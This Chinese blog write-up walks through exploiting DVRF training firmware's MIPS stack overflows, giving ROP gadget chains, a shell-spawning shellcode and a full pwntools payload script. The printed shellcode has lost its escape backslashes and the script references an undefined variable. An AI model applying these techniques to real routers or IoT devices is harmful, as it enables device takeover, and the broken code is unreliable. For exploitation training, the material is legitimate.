前言
最近导师要搞IOT漏洞挖掘项目,我得找找IOT学习资料,DVRF就适合IOT设备漏洞挖掘从入门到入坟....(bushi
固件分析
Squashfs系统,还是小端序,提取一下文件
有漏洞的程序在pwnable目录下
不过DVRF里面还附带有程序的源码,所以我们先看看源码,再来看二进制程序
题目
stack_bof_01
乍一看,strcpy()和system()都有,buff叠满了,细一看system()函数是固定字符串,应该不会造成命令注入漏洞,因为已经把控制参数都给写好了(什么地狱笑话),直接留了个后门,所以只剩下strcpy()这个常见的栈溢出漏洞函数,没有对输入的内容限制长度,所以有栈溢出。buf一共200字节长度,只要argv[]这个我们可控的参数长度超过200就可以覆盖掉buf,然后劫持函数执行流到system("/bin/sh -c")这个后门函数即可
先checksec检查二进制文件信息
什么都没有,城门大开,并且是mips32位小端序,所以要模拟起来的话,需要qemu-mipsel,考虑到动态链接经常出幺蛾子,所以直接搞个静态的,即qemu-mipsel-static到固件的根目录下,
然后开启模拟
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/statck_bof_01一开始以为显示的是缺少参数东西,检查了好久检查不出个所以然,后来才反应过来这是要在后面输入东西,然后就看见模拟成功跑起来了
那接下来我们需要得到一个偏移量,即argv[]参数到寄存器R31也就是$ra的偏移量,要么静态IDA查看计算一番,不过有可能会不准,所以直接一劳永逸用动态调试来计算好了
首先开启一个端口8888
sudo chroot . ./qemu-mipsel-static -g 8888 ./pwnable/Intro/statck_bof_01然后另起一个窗口,开启动态调试
gdb-multiarch stack_bof_01
set architecture mips
target remote 127.0.0.1:8888
进来pwndbg初始状态
由于一开始已经在main函数里,所以直接n单步步过到strcpy函数,按理说这个流程应该没错,但是不知道是不是pwndbg自身的问题,一直报错
【----帮助网安学习,以下学习资料加vx:YJ-2021-1,备注“思否”获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
排查了一天也不知道怎么解决,后来网上找了一个黑盒测试的方法
主要用于 调试 MIPS 架构的缓冲区溢出漏洞
ulimit -c unlimited #启用核心转储(core dump)功能,并解除大小限制,当程序崩溃,比如说段错误时,系统会生成一个 core 文件,记录崩溃时的内存状态,如寄存器、堆栈等 此命令确保 core 文件能被完整生成
sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern' #设置核心转储文件的命名格式,方便后续调试时快速定位对应的崩溃文件
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 `cyclic 1000` #在 chroot 环境中,使用 QEMU 用户态模拟器运行 MIPS 小端序程序,并触发崩溃,程序因缓冲区溢出崩溃,生成 core 文件
sudo gdb-multiarch ./pwnable/Intro/stack_bof_01 ./qemu_stack_bof_01_20250406-074606_5214.core -q #使用支持多架构的 GDB 加载程序及其核心转储文件进行调试,查看崩溃时的寄存器状态,比如说$pc 的值,确定溢出点偏移量
cyclic -l 0x63616162 #通过崩溃时覆盖的地址,这里是0x63616162,反推溢出点偏移量 cyclic 工具生成一个 唯一递增的 4 字节模式字符串 比如说aaaabaaacaaadaaa...当程序崩溃时,若寄存器的值是 0x63616162(对应 ASCII baac,注意小端序),则执行cyclic -l 0x63616162 该值在模式字符串中的偏移量,即溢出点到返回地址的偏移说白了,整个调试模式流程如下:
- 生成崩溃:通过
cyclic字符串触发程序崩溃,生成core文件 - 定位偏移:用
cyclic -l <地址>计算偏移量 - 构造 Payload:根据偏移量构造
填充数据 + 目标地址的利用载荷 - 重新触发:用构造的 Payload 替换
cyclic字符串,验证漏洞利用
学到了学到了
所以我们得到了偏移204的位置覆盖了返回地址,所以我们要先覆盖204个字节长度(这里不用再加上4个字节长度的寄存器了,因为204就已经包括了寄存器了),然后再加上程序自己留的后门函数system("/bin/sh -c")的地址,就可以完成一次攻击劫持流
由IDA可知,后门函数地址为0x00400950,并且要注意这里是小端序的写法,所以payload为
sudo chroot ./ ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 `python -c 'print(b"a"*204 + b"\x50\x09\x40\x00")'`
由于pwndbg动态调试的时候出现异常,所以这里改为用IDA进行远程动态调试
不出意外崩了,毫不意外呢....
根据技术文档分析,程序崩溃的根源与MIPS架构特性直接相关
在缓冲区溢出攻击场景中,全局指针寄存器$gp被覆盖是触发异常的核心因素。该寄存器负责维护全局数据区的基址定位,其值被破坏后,程序无法通过偏移计算正确访问全局变量或静态存储区,最终因寻址错误,比如说访问非法内存地址,导致崩溃
进一步结合漏洞利用流程,MIPS的函数执行机制要求$t9寄存器必须指向当前函数的入口地址,这是指令集中对函数跳转和数据索引的硬性规范。例如,调用dat_shell函数时,若$t9未正确指向其起始地址,代码将无法解析函数内的相对偏移,进而引发执行流紊乱
t9 寄存器总是保存的是函数的开头地址,若通过控制 ra 直接劫持到目标函数,t9 寄存器没有变化,还是原来调用过的函数的地址
所以需要调用 ROP 来设置一次 t9 寄存器的地址为后门地址,进而 jr $t9,才能使得 gp 寄存器正确的寻址
而且这里不能用 python -c 命令作为命令行参数传进去,因为在 python 输出过程中会被截断
因此,完整的利用链需分两步完成:首先通过ROP gadget精准设置$t9寄存器的值,使其符合目标函数dat_shell的入口地址,再通过控制流劫持跳转至目标函数,从而绕过MIPS架构的寄存器约束,实现稳定攻击
所以现在首要目标就是要找到一个gadgets,可以跳转到$t9寄存器,然后修改返回地址到 rop_gadget, 设置 $t9 为 dat_shell 函数的地址,跳转到 dat_shell 函数,执行system,在原程序中没有找到跳转到$t9的gadget
在DVRF固件所提供的文件libc.so.0中刚好能找到我们想要的gadget
但是这不是真正的地址,我们得去找到libc的基地址再加上0x6b20才是我们所以填写到payload中的地址
所以现在问题又变成了怎么找到libc的基地址,因为从ida来看,并没有@plt表,所以通过泄露一些在程序中已被调用的函数的地址,通过其在程序运行起来的地址减去在libc.so.0内的地址从而得到libc的基地址
那我们就用这个第一个的memset函数,在libc.so.0的地址为0001BE10
ida在memset下个断点,然后远程动态调试
找到memset在执行的时候的真正地址,为0x7F700E10
libc_base=0x7F700E10-0x0001be10=0x7f6e5000
gadget地址为=0x7f6e5000+0x6b20=0x7F6EBB20
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x20\xbb\x6e\x7f\x50\x09\x40\x00'")"
我看网上还有一种方法,因为dat_shell的首地址在0x00400950,但是直接跳过去的话又会发生崩溃,所以在0x00400950处下一个断点,看看到底咋回事
可以看到经过三次单步步过之后,gp寄存器指向了一块不知名且无法访问的内存空间
而gp寄存器在MIPS中$gp是 全局指针寄存器,用于高效访问静态数据区,比如说全局变量、常量等
程序启动时,$gp 由运行时环境,比如说启动代码设置为指向 .got或数据段中间位置。
当$gp指向了一块不知名且无法访问的内存区域时,通常意味着程序在初始化、链接或运行时逻辑中存在严重问题,也有可能时$gp 本应在程序生命周期内保持恒定,但若代码中错误地修改了 $gp,比如说如误将其用作临时寄存器),会导致后续全局数据访问失败
总之既然直接跳转到0x00400950会发生错误,那根据上述的调试可知,只要绕过前面三步单步步过就可以了,所以把payload地址修改为0x0040095c
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x5c\x09\x40\x00'")"
又get一种黑科技写法
这道题最重要的就是学到$t9寄存器的值是MIPS程序的函数的起始地址,这对rop链构造是至关重要的
stack_bof_02
先看源码
这一漏洞的本质仍属于典型的栈溢出攻击场景
程序通过命令行参数获取输入数据,在利用strcpy函数进行数据复制时,由于未对参数长度进行有效性校验,导致超出目标缓冲区的容量边界,从而引发栈空间溢出
而且,根据《揭秘家用路由器0day漏洞挖掘技术》书中所写到,main函数在MIPS架构中被归类为非叶子函数,这意味着其栈帧中会保存返回地址寄存器$ra
当溢出发生时,就可以通过构造的输入数据覆盖栈上存储的$ra值,当main函数执行完毕并尝试通过jr $ra返回时,程序流将被劫持到被篡改的地址
不过跟上一道相比,少了后门函数
因此,我们需要通过注入Shellcode到栈或寄存器中,并将$ra覆盖为Shellcode的起始地址,从而在程序返回时触发攻击代码的执行
检查一下文件,发现啥保护都没有,32小端序
模拟,启动!
sudo chroot . ./qemu-mipsel-static ./pwnable/ShellCode_Required/stack_bof_02
这已经明示了要弄shellcode了
动态调试还是不行啊...搞不定,用用黑盒测试
要覆盖508个字节长度
准备构造ROP
由于MIPS采用流水线指令集架构,其存在cache incoherency特性,因此在跳转到shellcode之前必须调用sleep等函数将数据区刷新至当前指令区,这样才能保证shellcode的正常执行
流水线指令集架构
是一种通过并行化处理指令执行过程来提高处理器效率的设计方法。其核心思想是将指令的执行过程划分为多个独立的阶段
比如说取指、译码、执行、访存、写回等
每个阶段由专门的硬件单元处理,不同阶段的指令可以同时执行,从而形成类似“工厂流水线”的工作模式
典型的流水线分为以下阶段(以经典5级流水线为例):
- 取指(IF):从内存中读取指令。
- 译码(ID):解析指令的操作码和操作数。
- 执行(EX):执行算术或逻辑运算。
- 访存(MEM):访问内存(如加载或存储数据)。
- 写回(WB):将结果写回寄存器。
每个阶段完成后,指令会传递到下一阶段,同时新的指令进入当前阶段。例如:
- 第1条指令处于写回阶段时,
- 第2条指令可能处于访存阶段,
- 第3条指令处于执行阶段,
- ...
举个例子
ADD R1, R2, R3 #R1 = R2 + R3,算术运算
LW R4, 0(R1) #从内存地址R1+0加载数据到R4,访存操作
SUB R5, R4, R6 # R5 = R4 - R6,依赖第2条指令的R4结果
BEQ R5, R0, LABEL #若R5 == 0,跳转到LABEL,分支指令| 周期 | IF(取指) | ID(译码) | EX(执行) | MEM(访存) | WB(写回) | 关键现象说明 |
|---|---|---|---|---|---|---|
| 1 | ADD | - | - | - | - | 开始取第一条指令 |
| 2 | LW | ADD | - | - | - | ADD进入译码,LW开始取指 |
| 3 | SUB | LW | ADD | - | - | ADD执行,LW译码,SUB取指 |
| 4 | BEQ | SUB | LW | ADD | - | ADD完成EX,结果旁路给LW的访存地址 |
| 5 | NOP(停顿) | BEQ | SUB | LW | ADD | LW访存,SUB需等待R4结果,流水线停顿1周期 |
| 6 | LABEL指令 | NOP | BEQ | SUB | LW | BEQ执行分支判断,SUB完成EX |
| 7 | - | LABEL指令 | NOP | BEQ | SUB | 分支预测失败,清空流水线(若R5≠0则继续执行) |
| 8 | - | - | LABEL指令 | NOP | BEQ | 恢复执行后续指令 |
所以,我们需要在跳转前调用 sleep(1) 刷新指令缓存,而sleep函数将参数存放在$a0寄存器中,所以我们在libc.so.0中寻找我们所要的gadget
随便选一个了,选了第二个,且gadget的末尾是跳转到$s1寄存器,先到0x0002fb10地址查看一番
由图所示,我们还要找到可以控制$s1的gadget,以便覆盖数据的时候可以覆盖掉$s1寄存器
但是在main函数中没有出现类似 lw $s0, offset($sp) 的指令,意味着该函数未主动恢复保存寄存器($s0−$s7)的值
函数内部使用了($s0-$s7)这些寄存器,需在函数开头将其保存到栈中(sw $sN, offset($sp)),并在返回前恢复(lw $sN, offset($sp))。
而临时寄存器($t0-$t9)无需保存,调用者需假设其值在函数调用后可能被破坏。
若main函数未使用s0−s7,则无需在栈帧中保存/恢复这些寄存器,因此末尾不会有lw $s0, offset($sp)类指令。
所以由于main函数末尾没有lw $s1, offset($sp),攻击者无法通过覆盖栈上保存的$s1旧值来直接控制该寄存器。
所以,无法直接控制$s1寄存器
需通过其他途径间接控制$s1,比如说,利用其他函数中的gadget恢复$s1,或者是通过数据传递链,比如move指令,将可控寄存器的值传递到$s1
所以还是通过mipsrop.find("lw $s1")找到了一些gadget 0x00006A50
理一下逻辑,使用gadget2=0x00006A50这段gadget设置好寄存器,修改好$s1的值,然后使用gadget1=0x0002FB10这段gadget去刷新数据区
同时还是要找到libc的地址,由上一题可知,libc基地址为0x7f6e5000
所以gadget1=0x7f6e5000+0x0002fb10=0x7f714b10
gadget2=0x00006a50+0x7f6e5000=0x7f6eba50
并且由ida可知调整shellcode的位置为0x58
gadget1=0x7f714b10
gadget2=0x7f6eba50
payload="a"*508
payload+=p32(gadget2)
payload+="a"*0x58
payload+="aaaa" #覆盖s0
payload+="aaaa" #覆盖s1
payload+="aaaa" #覆盖s2
payload+=p32(gadget1)
由ida可知,sleep静态地址为0x0002F2B0,再加上libc_addr的话就为0x7F7142B0
但是不能把sleep地址直接写到s1上,因为当这里填入sleep函数的地址后,程序会直接跳转执行sleep函数,但由于$ra寄存器仍保留着gadget1的地址,在sleep函数执行完毕后又会重新返回到当前位置。因此,需要寻找一个具备双重功能的gadget3——它既能通过s0或s2寄存器实现跳转控制,同时又能够对ra寄存器进行重新赋值,通过mipsrop.tail()找到的gadget3 0x00020F1C+libc_addr=0x7f705f1c
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+="aaaa"#覆盖$rasleep函数执行完之后,得找一个可以跳转的地址,并且在那上面可以写shellcode
不过没有找到,在师傅建议下,找了一个可以先控制寄存器上的值,再跳转到这里,通过mipsrop.stackerfind(),gadget4=0x00016dd0+libc_addr=0x7f6fbdd0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra从ida显示的0x00016dd0可知,我们还得找一个可以利用$a0跳转的gadget5,直接简单粗暴 mipsrop.find("move $t9,$a0") gadget5=0x000214A0+libc_addr=0x7f7064a0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode随便找了个网站生成了一段小端的shellcode
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404完整的payload
from pwn import *
context.binary = "./pwnable/ShellCode_Required/stack_bof_02"
context.arch = "mips"
context.endian = "little"
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode
with open("stack_bof_02_pyload","w") as file:
file.write(payload)
这道题最重要的就是学到mipsrop链的构造。
更多网安技能的在线实操练习,请点击这里>>
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。